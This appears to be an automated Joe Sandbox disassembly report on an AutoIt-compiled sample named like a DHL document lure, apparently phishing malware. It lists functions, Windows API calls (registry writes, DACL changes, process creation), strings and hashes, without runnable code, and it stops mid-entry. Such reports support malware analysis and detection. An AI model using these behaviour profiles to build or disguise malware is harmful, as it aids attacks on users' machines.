Part of subcall function 004510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 0045112F
Part of subcall function 004510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 00451136
Part of subcall function 004510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00450DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00450E29
GetLengthSid.ADVAPI32(?), ref: 00450E40
GetAce.ADVAPI32(?,00000000,?), ref: 00450E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00450E96
GetLengthSid.ADVAPI32(?), ref: 00450EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00450EB5
HeapAlloc.KERNEL32(00000000), ref: 00450EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00450EDD
CopySid.ADVAPI32(00000000), ref: 00450EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00450F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00450F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00450F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00450F6E
HeapFree.KERNEL32(00000000), ref: 00450F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00450F7E
HeapFree.KERNEL32(00000000), ref: 00450F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00450F8E
HeapFree.KERNEL32(00000000), ref: 00450F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00450FA1
HeapFree.KERNEL32(00000000), ref: 00450FA8

Part of subcall function 00451193: GetProcessHeap.KERNEL32(00000008,00450BB1,?,00000000,?,00450BB1,?), ref: 004511A1
Part of subcall function 00451193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00450BB1,?), ref: 004511A8
Part of subcall function 00451193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00450BB1,?), ref: 004511B7

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 29d8273838632a22e39becefdc94996d0b1a17e89ec8e9cb6dd2dd5a23081db1
Instruction ID: a9c90ce2fa76622eb654c8e7f2d484fa7f1d4e59cbe141a9431c3aa7294885e0
Opcode Fuzzy Hash: 29d8273838632a22e39becefdc94996d0b1a17e89ec8e9cb6dd2dd5a23081db1
Instruction Fuzzy Hash: 4371B176900209ABDF209FA0DC89FAFBBB8BF05301F14452AF914E6252D774D909CB74

Function 0047C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0047C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0048CC08,00000000,?,00000000,?,?), ref: 0047C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0047C5A4
_wcslen.LIBCMT ref: 0047C5F4
_wcslen.LIBCMT ref: 0047C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0047C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0047C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0047C84D
RegCloseKey.ADVAPI32(?), ref: 0047C881
RegCloseKey.ADVAPI32(00000000), ref: 0047C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0047C960

Strings

REG_SZ, xrefs: 0047C644
REG_DWORD, xrefs: 0047C804
REG_MULTI_SZ, xrefs: 0047C6F5
REG_QWORD, xrefs: 0047C8C3
REG_EXPAND_SZ, xrefs: 0047C5CD
REG_BINARY, xrefs: 0047C913

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 84cdb58b8688eddcf5137b7047e62a094dce9c3c7c455056a7d19d0f80d9d77c
Instruction ID: 97c50a07fc5cdef53edee673525750b3a63c923f06d3bfff5c53a87d00291f17
Opcode Fuzzy Hash: 84cdb58b8688eddcf5137b7047e62a094dce9c3c7c455056a7d19d0f80d9d77c
Instruction Fuzzy Hash: 0D128A352042019FC715DF24C881A6AB7E5FF89714F05885EF98A9B3A2DB35FC45CB8A

Function 0048091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004809C6
_wcslen.LIBCMT ref: 00480A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00480A54
_wcslen.LIBCMT ref: 00480A8A
_wcslen.LIBCMT ref: 00480B06
_wcslen.LIBCMT ref: 00480B81

Part of subcall function 0040F9F2: _wcslen.LIBCMT ref: 0040F9FD

Part of subcall function 00452BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00452BFA

Strings

EXISTS, xrefs: 00480B7C, 00480B97
SELECT, xrefs: 00480D11
ISCHECKED, xrefs: 00480CE1
GETTEXT, xrefs: 00480C97
COLLAPSE, xrefs: 00480B01, 00480B1C
GETSELECTED, xrefs: 00480C4E
GETITEMCOUNT, xrefs: 00480C1E
GETTOTALCOUNT, xrefs: 004809F2, 00480A17
EXPAND, xrefs: 00480BF8
CHECK, xrefs: 00480A85, 00480AA0
UNCHECK, xrefs: 00480D3E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 40e066e7687da88a65f8f897a3505bba67b6168c7b02f05346cf787d0c04dbcc
Instruction ID: 61d9b448b46a2b6aee3db2680cc004e277f8b78fe34c4a0bd7dc98d0e71a11b2
Opcode Fuzzy Hash: 40e066e7687da88a65f8f897a3505bba67b6168c7b02f05346cf787d0c04dbcc
Instruction Fuzzy Hash: 2CE1BF312183018FC754EF25C45096EB7E1BF99318B108D5EF89A9B3A2D738ED49CB99

Function 0047C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047B6AE,?,?), ref: 0047C9B5
_wcslen.LIBCMT ref: 0047C9F1
_wcslen.LIBCMT ref: 0047CA68
_wcslen.LIBCMT ref: 0047CA9E
_wcslen.LIBCMT ref: 0047CAF9
_wcslen.LIBCMT ref: 0047CB2F
_wcslen.LIBCMT ref: 0047CB7F

Strings

HKEY_USERS, xrefs: 0047CBDF
HKCU, xrefs: 0047CBCE
HKLM, xrefs: 0047CA98, 0047CA9D
HKCC, xrefs: 0047CBAC
HKEY_CURRENT_USER, xrefs: 0047CBBD
HKEY_CURRENT_CONFIG, xrefs: 0047CB79, 0047CB7E
HKEY_CLASSES_ROOT, xrefs: 0047CAF3, 0047CAF8
HKU, xrefs: 0047CBF0
HKCR, xrefs: 0047CB29, 0047CB2E
HKEY_LOCAL_MACHINE, xrefs: 0047CA62, 0047CA67

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: dbd06ef8be981e3cf8c8eb0f2afdbaa0a6eb5ae951d4f4af19646e697c78e885
Instruction ID: caae4f080c3d0fdd5dda2ebc6d117cd949d9e2419ad14b784b9e685741ba7212
Opcode Fuzzy Hash: dbd06ef8be981e3cf8c8eb0f2afdbaa0a6eb5ae951d4f4af19646e697c78e885
Instruction Fuzzy Hash: 1F71D67260012A8BCB20DE78D9816FB33919BA4754B25852FF859A7384EB3DDD45C3A8

Function 0048833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0048835A
_wcslen.LIBCMT ref: 0048836E
_wcslen.LIBCMT ref: 00488391
_wcslen.LIBCMT ref: 004883B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004883F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00485BF2), ref: 0048844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00488487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004884CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00488501
FreeLibrary.KERNEL32(?), ref: 0048850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048851D
DestroyIcon.USER32(?,?,?,?,?,00485BF2), ref: 0048852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00488549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00488555

Strings

.dll, xrefs: 004883AB
.icl, xrefs: 00488368
.exe, xrefs: 00488388

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 75671be36684c73dd877b3f26cb3f3f7a0b52367f522fa5353c8511fd2b5f849
Instruction ID: d24a7bf4f3b2d461f140946363a9c5e4630f8751b4d3cf0b3206c7ebc7174e9f
Opcode Fuzzy Hash: 75671be36684c73dd877b3f26cb3f3f7a0b52367f522fa5353c8511fd2b5f849
Instruction Fuzzy Hash: 8261E271500219BAEB14EF64CC81BFF77A8BF04B11F50491EF915D61D1EB78A980CBA8

Function 003F7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#notrayicon, xrefs: 003F77E7
#ce, xrefs: 003F78ED
Unterminated group of comments, xrefs: 0043528C
#requireadmin, xrefs: 003F77FF
#include, xrefs: 003F7847
#comments-start, xrefs: 003F785F, 003F78B1
", xrefs: 00435153
#include-once, xrefs: 003F782F
Bad directive syntax error, xrefs: 0043519A
#comments-end, xrefs: 003F78D9
#cs, xrefs: 003F7873, 003F78C5
Cannot parse #include, xrefs: 00435279
#pragma compile, xrefs: 003F77D3
', xrefs: 00435169
#OnAutoItStartRegister, xrefs: 003F7817

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: b3c3291a4902f26fbb72cc169b17d65c867eb7d6a7d12f64e0dece0f66e98523
Instruction ID: 5ec1a84a0bec16b83cb8704cee538f7b5b2734a956237b2a2dce8470ecd41c97
Opcode Fuzzy Hash: b3c3291a4902f26fbb72cc169b17d65c867eb7d6a7d12f64e0dece0f66e98523
Instruction Fuzzy Hash: 56810971A04209BBDF21BF61CC42FBF3768AF14300F14403AFA04AA196EB79D955C7A9

Function 00455A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00455A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00455A40
SetWindowTextW.USER32(?,?), ref: 00455A57
GetDlgItem.USER32(?,000003EA), ref: 00455A6C
SetWindowTextW.USER32(00000000,?), ref: 00455A72
GetDlgItem.USER32(?,000003E9), ref: 00455A82
SetWindowTextW.USER32(00000000,?), ref: 00455A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00455AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00455AC3
GetWindowRect.USER32(?,?), ref: 00455ACC
_wcslen.LIBCMT ref: 00455B33
SetWindowTextW.USER32(?,?), ref: 00455B6F
GetDesktopWindow.USER32 ref: 00455B75
GetWindowRect.USER32(00000000), ref: 00455B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00455BD3
GetClientRect.USER32(?,?), ref: 00455BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00455C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00455C2F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 0abc181ff462ebf40e0a64a9c3de8383f3d8d220860b3e1418fa98382fe20ec6
Instruction ID: 3495fe51c6e0ffadac55f969c2f5623708e7d08b569ff72682e92f627a629bf7
Opcode Fuzzy Hash: 0abc181ff462ebf40e0a64a9c3de8383f3d8d220860b3e1418fa98382fe20ec6
Instruction Fuzzy Hash: 9C719F31900B059FDB20DFA8CE99A6EBBF5FF48705F10092DE542A26A1D778F944CB58

Function 004530F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0045318D
_wcslen.LIBCMT ref: 004531F8

Strings

[K, xrefs: 0045339A
REGEXPCLASS, xrefs: 00453255, 00453266
NAME, xrefs: 00453335, 00453346
INSTANCE, xrefs: 00453453
TEXT, xrefs: 0045347C
CLASS, xrefs: 00453188, 004531A5
CLASSNN, xrefs: 004531F3, 00453204

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[K
API String ID: 176396367-19976038
Opcode ID: d9d93d7e931d3af60e8367f718a0df0c4abe119ee0e8dae2db1b3feffc30f934
Instruction ID: 40ed83ab558472b0f145418a6bbaca29da164d73c8288926d44387cffdf2d2d0
Opcode Fuzzy Hash: d9d93d7e931d3af60e8367f718a0df0c4abe119ee0e8dae2db1b3feffc30f934
Instruction Fuzzy Hash: 81E1F731A00519ABCB149F74C4417EEFBB0BF44792F64816BEC56A7341DB38AE8D87A4

Function 004100C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004100C6

Part of subcall function 004100ED: InitializeCriticalSectionAndSpinCount.KERNEL32(004C070C,00000FA0,9D9E2F1C,?,?,?,?,004323B3,000000FF), ref: 0041011C
Part of subcall function 004100ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004323B3,000000FF), ref: 00410127
Part of subcall function 004100ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004323B3,000000FF), ref: 00410138
Part of subcall function 004100ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041014E
Part of subcall function 004100ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041015C
Part of subcall function 004100ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041016A
Part of subcall function 004100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00410195
Part of subcall function 004100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004101A0

___scrt_fastfail.LIBCMT ref: 004100E7

Part of subcall function 004100A3: __onexit.LIBCMT ref: 004100A9

Strings

WakeAllConditionVariable, xrefs: 00410162
kernel32.dll, xrefs: 00410133
SleepConditionVariableCS, xrefs: 00410154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00410122
InitializeConditionVariable, xrefs: 00410148

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 72a333e0619358093f2ec7e62cbe82aee84d43233197bc53c105db81bd637b15
Instruction ID: 9f2ad5eea65327db13b59e5608beb83f706174fc2d7d5cd35ffa8eefb7280e49
Opcode Fuzzy Hash: 72a333e0619358093f2ec7e62cbe82aee84d43233197bc53c105db81bd637b15
Instruction Fuzzy Hash: 2D21DA32645710ABD7116B64AC89BAE37D4DB44B55F10053FF901E2691DBFD98808BAC

Function 004644C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0048CC08), ref: 00464527
_wcslen.LIBCMT ref: 0046453B
_wcslen.LIBCMT ref: 00464599
_wcslen.LIBCMT ref: 004645F4
_wcslen.LIBCMT ref: 0046463F
_wcslen.LIBCMT ref: 004646A7

Part of subcall function 0040F9F2: _wcslen.LIBCMT ref: 0040F9FD

GetDriveTypeW.KERNEL32(?,004B6BF0,00000061), ref: 00464743

Strings

all, xrefs: 00464531, 00464536
cdrom, xrefs: 0046458F, 00464594
ramdisk, xrefs: 004646F1
network, xrefs: 0046469D, 004646A2
fixed, xrefs: 00464635, 0046463A
unknown, xrefs: 00464708
removable, xrefs: 004645EA, 004645EF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: c7ab1b9ec42558994191810ffb2f7a4201a08751a25699e4059c4cc62bf00d47
Instruction ID: 76bc457824fd5a8e38d641a3c6b30196ec379c60472df309a080d541101db248
Opcode Fuzzy Hash: c7ab1b9ec42558994191810ffb2f7a4201a08751a25699e4059c4cc62bf00d47
Instruction Fuzzy Hash: E4B1DE716083029BCB10EF28C890A6BB7E5AFE5724F50491EF59687291E738D845CB6B

Function 0048911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00409BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00409BB2

DragQueryPoint.SHELL32(?,?), ref: 00489147

Part of subcall function 00487674: ClientToScreen.USER32(?,?), ref: 0048769A
Part of subcall function 00487674: GetWindowRect.USER32(?,?), ref: 00487710
Part of subcall function 00487674: PtInRect.USER32(?,?,00488B89), ref: 00487720

SendMessageW.USER32(?,000000B0,?,?), ref: 004891B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004891BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004891DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00489225
SendMessageW.USER32(?,000000B0,?,?), ref: 0048923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00489255
SendMessageW.USER32(?,000000B1,?,?), ref: 00489277
DragFinish.SHELL32(?), ref: 0048927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00489371

Strings

p#L, xrefs: 004892BB
@GUI_DRAGFILE, xrefs: 00489320
@GUI_DRAGID, xrefs: 004892E9
@GUI_DROPID, xrefs: 0048929E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#L
API String ID: 221274066-253960678
Opcode ID: 6579685d88d79b3af74d51ea20aaa3ed9b60dc94cca0f9efcb16a482aa417097
Instruction ID: fa789d4e5e6cab69fc60fa375c44d4ebbe1f71fbe05fbe60f11454df0d127bd7
Opcode Fuzzy Hash: 6579685d88d79b3af74d51ea20aaa3ed9b60dc94cca0f9efcb16a482aa417097
Instruction Fuzzy Hash: 7261AF71108305AFC702EF60DC85EAFBBE8EF89750F00092EF595971A1DB749A49CB66

Function 0047AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0047B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047B1D4
_wcslen.LIBCMT ref: 0047B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047B236
_wcslen.LIBCMT ref: 0047B332

Part of subcall function 004605A7: GetStdHandle.KERNEL32(000000F6), ref: 004605C6

_wcslen.LIBCMT ref: 0047B34B
_wcslen.LIBCMT ref: 0047B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047B3B6
GetLastError.KERNEL32(00000000), ref: 0047B407
CloseHandle.KERNEL32(?), ref: 0047B439
CloseHandle.KERNEL32(00000000), ref: 0047B44A
CloseHandle.KERNEL32(00000000), ref: 0047B45C
CloseHandle.KERNEL32(00000000), ref: 0047B46E
CloseHandle.KERNEL32(?), ref: 0047B4E3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

